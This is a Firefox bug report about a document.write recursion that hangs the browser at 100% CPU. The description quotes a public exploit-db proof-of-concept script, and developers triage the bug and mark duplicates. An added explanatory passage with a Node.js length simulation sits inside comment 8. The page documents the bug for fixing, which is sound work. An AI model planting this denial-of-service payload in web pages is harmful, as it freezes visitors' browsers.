Bug 612029 - document.write(document.body.innerHTML) DOS Attack (hang with 100% CPU) (exploit-db 15498) (missing slow script dialog)
Status: NEW
Whiteboard: [sg:dos]
Keywords: hang
Product: Firefox
Classification: Client Software
Component: General
Version: unspecified
Platform: x86 Windows XP
Importance: -- normal with 1 vote
Assigned To: Nobody; OK to take it and work on it
URL: http://www.exploit-db.com/exploits/15...
Duplicates: 612365 612597 744637 771622 833874
Depends on: 641105
Reported: 2010-11-13 13:08 PST by Yusuf Şen
Modified: 2015-03-19 08:20 PDT
Flags: wanted, wanted

Description Yusuf Şen 2010-11-13 13:08:31 PST
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12

<!-- six control characters (U+0000..U+0005) are written into the body first -->
<script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script>
<script>
var i=0;
// pad the body with 20000 'a' characters, one document.write() call each
for (i=0;i<=19999;i++)
{
    document.write("a");
}

// write the whole body (text plus these <script> elements) back into the parser, four times
for (i=0;i<=3;i++)
{
    document.write(document.body.innerHTML);
}

</script>

Reproducible: Always

Steps to Reproduce:
1. DDoS attack
Actual Results:  
[the same code as above, repeated]

Expected Results:  
[the same code as above, repeated twice]
Comment 1 Yusuf Şen 2010-11-13 13:09:29 PST
[the same code as in the description, repeated]
Comment 2 Yusuf Şen 2010-11-13 13:12:03 PST
http://www.cyber-heaven.tk
Comment 3 Mats Palmgren (vacation) 2010-11-14 18:25:51 PST
This was published 2010-11-12 at http://www.exploit-db.com/exploits/15498/
Comment 4 Mats Palmgren (vacation) 2010-11-14 20:13:38 PST
I don't see any crash using Fx 3.6.12 on WinXP, just a 100% CPU hang.
Comment 5 Daniel Veditz [:dveditz] 2010-11-15 10:13:25 PST
We probably didn't need 5 copies of the code in-line...

Since it's public at exploit-db there's no point in keeping the bug hidden, we'll just get dupes.
Comment 6 Dietrich Ayala (:dietrich) 2010-11-15 10:40:42 PST
Is 4.0 afflicted?
Comment 7 Mats Palmgren (vacation) 2010-11-15 17:22:59 PST
*** Bug 612365 has been marked as a duplicate of this bug. ***
Comment 8 Mats Palmgren (vacation) 2010-11-15 20:09:41 PST
(In reply to comment #6)
> Is 4.0 afflicted?

Yes, in the same way as 3.6.12: 100% CPU, no crash, no "slow script" dialog.
Tested on Linux, WinXP and OSX.  On Linux, the OOM killer kills the process
after ~10 seconds.
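The symptoms reported in comments 4 and 8 (100% CPU, no crash, the process eventually killed by the OOM killer) follow from document.write() semantics: markup written by a running script is tokenized into the document immediately, and a <script> element inside that markup is executed synchronously, nested inside the outer write() call. Since document.body.innerHTML contains the PoC's own <script> element, the first document.write(document.body.innerHTML) re-runs the script against a body that has roughly doubled, and that nested run does the same, so the recursion ends only when memory or a nesting limit is exhausted; the later loop iterations are never reached. The block below is an added example for this page, not code from the bug report or from Firefox: a Node.js model that tracks only body lengths, so it can be run instead of loading the PoC in a browser. The script-length constant, the byte budget standing in for memory, the depth budget standing in for a stack limit, and the function names are assumptions of the example; the padding and copy counts are parameters so other sizes than the PoC's 20000/4 can be tried.

```javascript
"use strict";

// Assumed length of the inline <script> markup that document.body.innerHTML
// carries along with the written text (the real PoC's script is of that order).
const SCRIPT_SRC_LEN = 120;

// Model one run of the PoC's second <script>. Only lengths are tracked:
//   padding  - number of single-character document.write("a") calls (20000 in the PoC)
//   copies   - number of document.write(document.body.innerHTML) calls (4 in the PoC)
//   maxDepth - nesting depth at which the model gives up (stands in for a stack limit)
//   maxBytes - body size at which the model gives up (stands in for running out of memory)
// Returns the body length seen at the start of every nesting level, which
// limit stopped the run (null if it finished on its own), and the final size.
function simulateRecursiveWrite({ padding, copies, maxDepth, maxBytes }) {
  const trace = [];
  let bodyLen = SCRIPT_SRC_LEN; // the document starts out holding just the script
  let aborted = null;

  function runScript(depth) {
    if (depth >= maxDepth) { aborted = "depth"; return; }
    if (bodyLen >= maxBytes) { aborted = "memory"; return; }
    trace.push(bodyLen);

    // for (i=0;i<=19999;i++) document.write("a"): text is tokenized into the
    // body as it is written, so the script sees it on the next innerHTML read.
    bodyLen += padding;

    for (let c = 0; c < copies && aborted === null; c++) {
      // document.write(document.body.innerHTML): snapshot the body (text plus
      // the <script> element itself) and feed it back to the parser.
      const snapshot = bodyLen;
      bodyLen += snapshot;
      // The copied <script> element is executed synchronously, nested inside
      // this write(), before the loop can continue. It never returns normally,
      // so with copies >= 1 the loop body runs exactly once at every level.
      runScript(depth + 1);
    }
  }

  runScript(0);
  return { trace, aborted, finalBytes: bodyLen };
}

// Growth per level follows from the model: the next level starts with the
// whole body written back once, i.e. 2 * (previous + padding).
function growthFactor(trace, padding) {
  const ratios = [];
  for (let i = 1; i < trace.length; i++) {
    ratios.push(trace[i] / (trace[i - 1] + padding));
  }
  return ratios;
}

if (typeof require !== "undefined" && require.main === module) {
  // PoC parameters against a 1 GB byte budget (roughly a 32-bit process)
  const r = simulateRecursiveWrite({ padding: 20000, copies: 4, maxDepth: 1000, maxBytes: 1e9 });
  console.log("nesting levels before hitting the byte budget:", r.trace.length);
  console.log("body length at the start of each level:", r.trace.join(" "));
  console.log("stopped by:", r.aborted);
}
```

With the PoC's numbers the body doubles at every nesting level and the 1 GB budget is exhausted after fifteen levels, which matches a hang that is bounded by memory rather than by any per-script time limit; setting copies to 0 (no innerHTML write-back) is the only variant that finishes on its own.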
Comment 9 Ludovic Hirlimann [:Usul] 2010-11-16 08:46:44 PST
*** Bug 612597 has been marked as a duplicate of this bug. ***
Comment 10 Daniel Veditz [:dveditz] 2010-11-17 11:51:22 PST
We should at least figure out if we can make the slow-script dialog show up.
Comment 11 Mats Palmgren (vacation) 2013-01-23 19:01:49 PST
*** Bug 833874 has been marked as a duplicate of this bug. ***
Comment 12 Mats Palmgren (vacation) 2013-01-23 19:06:05 PST
*** Bug 771622 has been marked as a duplicate of this bug. ***
Comment 13 Mats Palmgren (vacation) 2013-01-23 19:18:02 PST
*** Bug 744637 has been marked as a duplicate of this bug. ***
